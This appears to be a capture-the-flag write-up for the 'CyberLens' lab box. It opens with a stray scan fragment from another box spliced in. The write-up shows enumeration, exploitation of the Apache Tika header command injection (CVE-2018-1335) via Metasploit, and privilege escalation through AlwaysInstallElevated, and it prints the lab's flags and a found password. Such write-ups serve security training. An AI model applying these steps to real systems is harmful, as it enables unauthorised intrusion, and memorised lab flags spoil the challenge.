mkingdom

Nmap

[└─$ nmap -sC -sV -oA nmap/mkingdom 10.10.0.63
# Nmap 7.94SVN scan initiated Tue Jun 18 11:40:55 2024 as: nmap -sC -sV -oA nmap/mkingdom 10.10.0.63
Nmap scan report for 10.10.0.63
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
85/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0H N0! PWN3D 4G4IN](<└─$ cat nmap/cyberlens.nmap
# Nmap 7.94SVN scan initiated Fri May 31 20:57:25 2024 as: nmap -sC -sV -oA nmap/cyberlens 10.10.94.45
Nmap scan report for 10.10.94.45
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-01T00:58:10+00:00; +1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-01T00:58:01+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-31T00:52:22
|_Not valid after:  2024-11-30T00:52:22
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-06-01T00:58:03
|_  start_date: N/A

User Flag

As there is smb service running, I tried login in with empty password, but I got “Access Denied”

└─$ smbclient -L \\10.10.116.165
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_ACCESS_DENIED

So, next thing I did was to visit homepage of the website and there is a upload file functionality in the website, and there is a button on side which says “Get Metadata”. So, I have uploaded sample jpeg image for testing.

Here is the result from the uploaded file.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

{
  "Component 1": "Y component: Quantization table 0, Sampling factors 2 horiz/2 vert",
  "Component 2": "Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert",
  "Component 3": "Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert",
  "Compression Type": "Baseline",
  "Content-Type": "image/jpeg",
  "Data Precision": "8 bits",
  "File Modified Date": "Thu Jun 20 01:46:46 +00:00 2024",
  "File Name": "apache-tika-12826399836580280142.tmp",
  "File Size": "27437 bytes",
  "Image Height": "460 pixels",
  "Image Width": "460 pixels",
  "Number of Components": "3",
  "Number of Tables": "4 Huffman tables",
  "X-Parsed-By": [
    "org.apache.tika.parser.DefaultParser",
    "org.apache.tika.parser.jpeg.JpegParser"
  ],
  "language": "",
  "tiff:BitsPerSample": "8",
  "tiff:ImageLength": "460",
  "tiff:ImageWidth": "460"
}

The file is been parsed, as we can see X-Parsed-By by org.apache.tika.parser.DefaultParser and org.apache.tika.parser.jpeg.JpegParser and quick googling gave us CVE-2018-1335 (More about CVE - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/)
Also in the source code, it is sending PUT request to http://cyberlens.thm:61777/meta

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

  <script>
    document.addEventListener("DOMContentLoaded", function() {
      document.getElementById("metadataButton").addEventListener("click", function() {
        var fileInput = document.getElementById("imageFileInput");
        var file = fileInput.files[0];

        var reader = new FileReader();
        reader.onload = function() {
          var fileData = reader.result;

          fetch("http://cyberlens.thm:61777/meta", {
            method: "PUT",
            body: fileData,
            headers: {
              "Accept": "application/json",
              "Content-Type": "application/octet-stream"
            }
          })
          .then(response => {
            if (response.ok) {
              return response.json();
            } else {
              throw new Error("Error: " + response.status);
            }
          })
          .then(data => {
            var metadataOutput = document.getElementById("metadataOutput");
            metadataOutput.innerText = JSON.stringify(data, null, 2);
          })
          .catch(error => {
            console.error("Error:", error);
          });
        };

        reader.readAsArrayBuffer(file);
      });
    });
  </script>

I have searched this exploit in Metasploit and luckily they have one.

msf6 > search apache tika

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection
msf6 > use 0

Here are options

Now, run this exploit,

C:\Users\CyberLens\Desktop>type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}

Root Flag

There is a text file in management folder, it says

C:\Users\CyberLens>type Documents\Management\CyberLens-Management.txt
Remember, manual enumeration is often key in an engagement ;)

CyberLens
HackSmarter123

But, I dont think this file is that useful, now moving the shell to background using background. Now, use use post/multi/recon/local_exploit_suggester to find local exploit. It seems, there are multiple exploit.

This is definitely vulnerable -exploit/windows/local/always_install_elevated: The target is vulnerable.
Setting the options,

Running the exploit,

C:\Users\Administrator\Desktop>type admin.txt
THM{3lev@t3D-4-pr1v35c!}